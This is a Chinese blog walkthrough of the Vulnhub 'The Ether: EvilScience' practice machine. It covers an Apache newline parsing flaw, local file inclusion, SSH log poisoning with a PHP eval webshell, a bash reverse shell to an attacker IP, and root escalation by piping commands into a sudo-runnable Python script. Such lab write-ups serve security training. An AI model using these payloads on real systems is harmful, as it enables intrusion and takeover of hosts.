Vulnhub 渗透练习(八)—— THE ETHER: EVILSCIENCE

最新推荐文章于 2024-08-06 20:44:59 发布
最新推荐文章于 2024-08-06 20:44:59 发布
阅读量623 收藏 2
点赞数 1
分类专栏: 渗透学习 文章标签: 渗透学习 vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/129110954
版权
文章详细描述了一次针对ApacheHTTPD服务器的漏洞利用过程,包括环境配置、端口扫描、发现换行解析漏洞并利用LFI字典找到SSH日志,通过SSH错误日志写入一句话木马。接着,作者通过`sudo-l`发现可以root权限运行的py文件,实现提权,并获取flag。整个过程展示了网络安全测试的基本步骤和技术。
摘要由CSDN通过智能技术生成

环境搭建

环境下载

靶机和攻击机网络适配都选 NAT 即可。

信息收集

主机扫描
在这里插入图片描述
两个端口,22 和 80,且 apache httpd 2.4.0~2.4.29 存在换行解析漏洞。

Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
来自:https://vulhub.org/#/environments/httpd/CVE-2017-15715/

在这里插入图片描述
测了半天,除了一个文件包含,也没发现特别的东西,看了大佬的 wp ,用 seclists 字典中的 LFI 字典跑一下。

就可以发现一个特殊的文件,ssh 的日志,
在这里插入图片描述

getshell

ssh 连接一下靶机,curl ip/var/log/auth.log,ssh 日志已经写入。
在这里插入图片描述
这边利用 ssh 登录产生错误日志写入一句话木马。
在这里插入图片描述

访问执行命令。
在这里插入图片描述
这反弹有点迷,这样就能弹出来,直接 bash … 弹不出来。

echo "bash -i >& /dev/tcp/192.168.29.129/9999 0>&1"|bash

在这里插入图片描述
有个 py 文件,cat 了下,直接卡主,还是在页面上看吧,里面是一堆加密后的代码。

在这里插入图片描述

提权

sudo -l 发现 xxxlogauditorxxx.py 可以以 root 运行。

在这里插入图片描述
先开个终端

python -c 'import pty;pty.spawn("/bin/bash");'

然后如下,就可以以 root 权限运行。

sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami

在这里插入图片描述

flag

复制 root 目录下的 flag 到网站中,下载下来,解码。

/var/log/auth.log | cp /root/flag.png /var/www/html/theEther.com/public_html/flag.png

在这里插入图片描述

wp

https://blog.csdn.net/weixin_34220834/article/details/88772835

总结

本地文件包含:利用 ssh 登录产生错误日志写入一句话木马
(ssh '<?php eval($_GET[1]);?>'@ip)
seclists 字典:https://github.com/danielmiessler/SecLists
sudo -l
succ3
关注
专栏目录
靶机渗透(十二)evilscience
qq_42180996的博客
05-23 1827
靶机evilscience 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页(80端口) 2.目录扫描(dirb) 3.文件包含漏洞利用 >另一种执行ls命令的方法 4...
capture the ether靶场题解(Lotteries)
m0_68764244的博客
10-25 1184
这题同样要求我们猜answer,但他的answer是在每次Guess的时候生成的,无法通过web3进行查询,但我们明白一件事,合约之间的调用是在同一个区块当中的,也就是说,如果我们通过攻击合约进行调用guess,那么我们攻击合约生成的answer与guess生成的answer是相同的。这关他的answer是随机生成的,根据创建时候的区块数量进行生成,并且由于没有进行修饰符修饰,默认为internal变量,所以我们无法直接看到,但任何数据在区块链上都是无法隐藏的,我们通过web3库就能直接拿到该值。
VulnHub-The Ether: EvilScience (v1.0.1)渗透学习
我是小小白的博客
07-09 610
VulnHub-The Ether: EvilScience (v1.0.1)渗透学习 前言 靶机地址:https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip 靶机难度:中级(CTF) 靶机发布日期:2017 年 10 月 30 日 靶机描述:最近,我一直喜欢为安全社区创造黑客挑战。这一新挑战囊括了一家名为 The Ether 的公司,该公司宣布了一种显着改变人类福利的灵丹妙药。由于他们正在开发的产品的性质,CDC 对这个群体产生了怀疑。 目标:
evilscience靶机复现
weixin_52956666的博客
08-02 151
因为只开放了ssh和http,尝试查看ssh日志。靶机IP为 192.168.112.150。靶机设置为NAT模式。发现存在文件包含漏洞。
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE
LYJ20010728的博客
08-07 1176
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE环境下载THE ETHER: EVILSCIENCE靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 THE ETHER: EVILSCIENCE靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 攻击机IP地址:192.168.246.129 渗透测试 信息搜集 用netdiscover查看一下:sudo netdiscover -r 192.168.246.0
vulnhub靶机渗透 theEther
RestoreJustice的博客
03-19 239
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。192.168.110.131,为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.110.1/24。官方提供了一个提示:靶机中有一个相关的文件,在渗透过程中发挥重要作用,但是不要浪费时间试图去解密这个混淆后的文件。获取webshell。之后利用前面获得的一句话,执行命令,下载生成的木马,并且运行。
Vulnhub靶机 The Ether: EvilScience (v1.0.1)(渗透测试详解)
2301_78721909的博客
08-03 246
Vulnhub靶机 The Ether: EvilScience (v1.0.1) 渗透测试拿shell
ether:使用ssh的在线商店
05-18
醚 使用ssh的在线商店
ether:Unity软件包,用于可调制并具有各种效果的信号变量
02-21
Ether是专为Unity游戏引擎设计的一个软件包,它专注于提供可调制且具有各种效果的信号变量。在Unity中,信号变量(或事件系统)通常用于实现组件间的通信,允许不同部分的游戏逻辑相互触发和响应特定事件。这个...
Hi-Ether:基于计时器的Discord Webhook,将倒计时数天,直到产品发布
05-11
【Hi-Ether:基于计时器的Discord Webhook】是一种创新的技术解决方案,它结合了JavaScript编程语言和Discord的Webhook功能,用于在产品发布前进行倒计时通知。这个系统的核心是利用计时器机制,实时更新并显示距离...
capture the ether靶场题解(Math)
m0_68764244的博客
11-21 1881
if代码块本身的逻辑是没有问题的,并不会出现变量覆盖的情况,但else就不一样了,由于没有进if,相当于直接创建了一个结构体变量,这势必会造成变量覆盖,而能够覆盖的就是数组的长度以及head。由于数组的长度取决于我们传入的wei数,而在push中会对数组的length++,length又跟amount公用一个slot,所以我们传入1wei则长度和amount都2,我们两次都传入1wei,则第一次push的结构体会被第二次push的结构体覆盖,具体原因我就不一一阐释了。
The Ether: EvilScience (v1.0.1)打靶渗透【附代码】(权限提升)
最新发布
weixin_52487093的博客
08-06 543
The Ether: EvilScience (v1.0.1)打靶渗透【附代码】(权限提升) 【文件包含的错误日志利用】
The Ether: EvilScience靶机渗透实战总结
weixin_34220834的博客
08-20 1161
近期朋友给我发了一个靶机,说是他在日志注入的时候遇到了一点小问题,让我帮忙解决一下。下载下来之后,感觉这个靶机还是挺不错的,里边有一些套路,于是整理成一篇文章,感兴趣的小伙伴可以自己尝试一下。 靶机下载https://www.vulnhub.com/entry... 信息收集首先扫描内网,发现目标主机ip arp-scan -l ...
Evilscience靶机渗透实战-vulnhub系列(五)
PANDA墨森的博客
07-04 577
这是vulnhub靶机系列文章的第五篇,本次的靶机主要学习到的漏洞利用为文件包含漏洞,话不多说,直接开始吧... 靶机下载地址:https://www.vulnhub.com/entry/the-ether-evilscience,212 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13195877.html #001 环境搭建(nat) 攻击机kali:192168.136.129 靶机evilscience:192.168.136.143 ..
kali渗透综合靶机(十六)--evilscience靶机
W小哥
04-02 1075
https://download.vulnhub.com/theether/theEther_1.0.1.zip
evilscience 靶机渗透
weixin_44769042的博客
10-30 522
目录 主机发现 端口扫描 服务版本,操作系统扫描 开始渗透 反弹shell 提权 提权成功,得到flag 总结 主机发现 这两个ip mac地址是一样的,随便用一个就行 端口扫描 服务版本,操作系统扫描 开始渗透 1> web端目录扫描 这个页面有个下载,但是没啥用 扫了一堆都没啥用 2> 主页找到一个类似文件包含的特征点 尝试包含一下/etc/passwd,,结果没啥用 3> 用字典跑一下包含目录 找到几个...
靶机实战-evilscience
滕财然的博客
01-28 738
evilscience靶机实战 文章目录evilscience靶机实战1、主机发现2、端口扫描3、端口详情扫描4、访问80端口5、提权方法一方法二 1、主机发现 目标IP:192.168.232.164 2、端口扫描 3、端口详情扫描 22端口–ssh、80端口–http 4、访问80端口 浏览网站,寻找有价值的信息 发现该网站有可能存在LFI(本地文件包含) 在about.php页面看...
Evilscience 渗透测试
Darklord.W
04-14 705
Evilscience渗透测试 0x00实验环境 靶机:Evilscience,IP地址:192.168.8.147 测试机:Kali,IP地址:192.168.8.145; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 主机发现 端口及服务扫描 探测web端 在url中发现疑似文件包含 扫描web目录 尝试文件包...
Protocols in frame: eth:ethertype:ip:icmp:data
05-24
这是一个网络数据包的协议栈,其中包含了以下协议: - Ethernet (eth):数据链路层协议,用于在本地网络中传输数据帧。 - Ethertype:以太网类型,用于标识上层协议类型,例如IP、ARP等。 - IP:网络层协议,用于在网络中传输数据包。 - ICMP:Internet控制报文协议,用于在IP网络中传递控制消息。 - Data:应用层数据,例如HTTP请求或DNS查询等。 在这个协议栈中,数据从应用层开始,逐层封装,最终被发送到物理层进行传输。当数据到达接收端时,它会被一层一层地解封,直到应用层可以读取数据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值